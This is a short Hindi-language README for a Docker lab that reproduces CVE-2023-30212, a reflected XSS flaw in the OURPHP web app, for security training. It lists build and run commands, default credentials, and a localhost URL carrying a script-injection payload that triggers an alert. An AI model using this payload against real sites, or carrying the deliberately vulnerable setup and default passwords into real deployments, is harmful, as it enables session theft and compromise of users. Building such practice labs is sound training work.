
# CVE-2023-30212 शोषण अभ्यास के लिए Docker-आधारित असुरक्षित वातावरण इसमें OURPHP वेब ऐप शामिल है जिसमें सुरक्षा प्रशिक्षण के लिए एक reflected XSS भेद्यता है।
git clone https://github.com/JasaluRah/Creating-a-Vulnerable-Docker-Environment-CVE-2023-30212-.git
अब डॉकर इमेज सेट करने के लिए
कमांड का उपयोग करें sudo docker build -t work .
कमांड का उपयोग करें sudo docker run -d -p 80:80 work
अब हमें कंटेनर आईडी मिलेगी
ब्राउज़र में जाएं और localhost ; 127.0.0.1 खोजें
अब क्रेडेंशियल का उपयोग करें
उपयोगकर्ता नाम : root
पासवर्ड : docker
डेटाबेस : work
उपयोगकर्ता नाम : work पासवर्ड : work
इस url पर जाएं http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("xss")</script>
हमें "xss" के रूप में अलर्ट संदेश मिलेगा।